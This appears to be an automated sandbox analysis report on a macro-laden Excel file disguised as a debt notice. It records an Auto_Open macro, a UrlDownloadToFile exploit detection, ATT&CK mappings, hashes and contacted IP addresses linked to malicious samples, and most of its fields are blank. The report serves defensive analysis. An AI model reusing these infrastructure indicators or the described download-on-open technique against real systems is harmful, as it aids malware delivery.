Analysis Report Outstanding-Debt-1636503299-05042021.xlsm
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Source: | Memory has grown: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: | OLE, VBA macro: | Name: Auto_Open |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: Auto_Open |
Source: | OLE indicator, VBA macros: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting32 | Path Interception | Extra Window Memory Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution12 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting32 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Extra Window Memory Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
5% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
3% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
91.211.91.81 | unknown | Ukraine | 206638 | HOSTFORYUA | false | |
5.34.179.36 | unknown | Ukraine | 204957 | GREENFLOID-ASUA | false | |
45.153.229.23 | unknown | Russian Federation | 25229 | VOLIA-ASUA | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 404076 |
Start date: | 04.05.2021 |
Start time: | 17:36:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 48s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Outstanding-Debt-1636503299-05042021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 28 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal60.expl.evad.winXLSM@1/9@0/3 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
91.211.91.81 | Get hash | malicious | Browse | ||
5.34.179.36 | Get hash | malicious | Browse |
| |
45.153.229.23 | Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
GREENFLOID-ASUA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
HOSTFORYUA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
VOLIA-ASUA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134558 |
Entropy (8bit): | 5.368391693613283 |
Encrypted: | false |
SSDEEP: | 1536:YcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:fEQ9DQW+zPXO8 |
MD5: | BE3F830EA62C6D351E3A20171D7169CA |
SHA1: | 5624164BB1A637D84F3317DD819DE878A6DF3457 |
SHA-256: | 27892735364DD6D8A0EFF8DCC7C373ED71780C0F787CA47929FCF9FA00C5DF58 |
SHA-512: | 9EB3D4ED9E7228E51AC7C7ABDF2C81444E11FBC5B772C23BED8F2001A4E0A48205F0336A3FE696873F70178729BDB65BDCB454738930ACF6552278079C466C3A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 92379 |
Entropy (8bit): | 7.654577060340879 |
Encrypted: | false |
SSDEEP: | 1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0 |
MD5: | 4A425E6A5A885C0D0E2589506FD2244B |
SHA1: | E23482422480A4720E22F311B42BD65E2F3556F8 |
SHA-256: | 76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160 |
SHA-512: | 3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 119848 |
Entropy (8bit): | 7.698949263748929 |
Encrypted: | false |
SSDEEP: | 3072:qy0FVzvKINbjvw548LMb/oqKO8NnS8+60Kcrm:2FV+AbT648LM7D98Np+EEm |
MD5: | 64D1D10A8D20607A7BC81479FD3CC8D1 |
SHA1: | FC3F554F52C07C5CD54BF7CE976EFDF5DD7D2E9E |
SHA-256: | 786A350C28D25E5D37979D6F254D5D1B575691CDD41D30AD3A6EFCB6A13C6FD7 |
SHA-512: | 6A24879180D6B6EEC0B4F64F95C371536176E4DE47DFCEC436A6CB8EF4AB9BA48D9CAEF5A3D46EA067FDACF30EEFEC74043D1543AA5B003A5D6971772BBC6C8F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 170164 |
Entropy (8bit): | 4.3663493242356 |
Encrypted: | false |
SSDEEP: | 1536:fablu5LVLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:frVg8WpFpKKHHedydFeo+oQLUlPoK0 |
MD5: | 0292F3AD2B0D230F50C604404DBB431C |
SHA1: | E6FE207F157C732DBF3B35DF2855DF87C9451070 |
SHA-256: | 5CBFF9DC1472272ADAC6BD1FE227724ED2BD83731F93FBA55D5F4923D9BA63A9 |
SHA-512: | 691236899FEA6651611BF1A79FD14C9726C43B58C57B3EE2093D14802F9BB4B9EDE31318EFB927CEDB2CD510D867C64B3E1992B400D169D18A1ACE5DBB5BCA67 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.643894175136201 |
Encrypted: | false |
SSDEEP: | 12:87tcXU9tuElPCH2ANM9SY5VA+WrjAZ/2bDxLLC5Lu4t2Y+xIBjKZm:8OS9B6AZiDxy87aB6m |
MD5: | 0C8DEF7F1F1356BD2C0DCEAF57E870DF |
SHA1: | 43F8B5DBA1CAFB41D1893009F02B18B23B20031C |
SHA-256: | 0C8C2BBFBA1AEDA32680ED997BD4ADD92E04D1DCF550F12210FFD2E17F90DD5C |
SHA-512: | 53EDE3CA8B2A08B2A46424B5520D9A4F756E28817BA0BB7093C77E7743CC91A0221FADEA548E1896EBB2BC944D7DF62EF4AF5678885187D678CBFE0F97DC18BD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2380 |
Entropy (8bit): | 4.70450306537084 |
Encrypted: | false |
SSDEEP: | 48:8bH8MH69/vsbDkB6pbH8MH69/vsbDkB6:8j8k6NsbDkKj8k6NsbDk |
MD5: | 2D2D77E82E07327478587BF566B288A0 |
SHA1: | F552F7AE430ACBD04918BDFBDDAF0B9C4C0D32BA |
SHA-256: | 1A9F76256C77929AB09A7ABE02E95F2EC1D445962D6BBDBB27EE25C59E7FCE48 |
SHA-512: | FB5CBEDCB5AF814E6D872AE8703C9DE483D59EE2C632B024CA8BFD4F981CCDFA03982846F280484A90ABC6ED56063FA270FFFB878C5C03AD48C7F4F762471B22 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 178 |
Entropy (8bit): | 4.9670243919485335 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWhl2Bbmdo0XV+lpSyEW92Bbmdo0XV+lpSmxWhl2Bbmdo0XV+lpSv:djSlzO0cpoW9zO0cpslzO0cpc |
MD5: | 2148A1EF21AAB827E2B3D954EC3544B2 |
SHA1: | EA9C3BB20AA72936251A9E9EBBA0B28D19FC74C0 |
SHA-256: | E41A77FC9A0A1854503769CDA037AC2CC0A6C2BF96ADD9934263870F4597BCCF |
SHA-512: | FE181F2663639EF6703A98319A70D27A51913F847DD689930D65885A64480B05ED7E13D4F50BD418D68E9A04D0F534068A6FE21BD46D6F957B913E6CEFAE6FD2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 119832 |
Entropy (8bit): | 7.69934282911382 |
Encrypted: | false |
SSDEEP: | 3072:syO8vKINbjvw548LMb/oqKO8NnS8+60Kcr6:mxAbT648LM7D98Np+EE6 |
MD5: | AF067CE60168E23936E6F806A64CE72E |
SHA1: | A4B3BFD03C8C2A24A341E55551AECAAEFA3B4DB0 |
SHA-256: | 8A907030E152C2A0B23B3BD1C25BEB101DBA38F6CB6F766AE6BB3FA5223A23B5 |
SHA-512: | A25283A2EE8328A5CD7C92FE1826640F923A0265D702F121D4576F684107C35D55ED865A3FC21F2F1B9BF25A7FC2C7C2AC035A58C64203FCEAED70FAC1CAC5F2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.68857711695949 |
TrID: |
|
File name: | Outstanding-Debt-1636503299-05042021.xlsm |
File size: | 116934 |
MD5: | 770ec8230138bb271c449bdaf5da519b |
SHA1: | 21a0bde033c46eab8d42e5b6d9431f52f5c6ce48 |
SHA256: | 43c9954c68907acc1f1a6e7d5cc90a3043f9da1c8416b079d182865abea734c7 |
SHA512: | 62ff4c914258230d73e372f4c6153c6eabcea6c43e7049c7bee3503ba8c9e02c09615d3fcdd2779d3e765674eedf41f2b68ac2a04a9f91fe4a2633f06223ab81 |
SSDEEP: | 3072:1kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:WAbT648LM7D98Np+EdECx |
File Content Preview: | PK..........!."..R....*.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "/opt/package/joesandbox/database/analysis/404076/sample/Outstanding-Debt-1636503299-05042021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
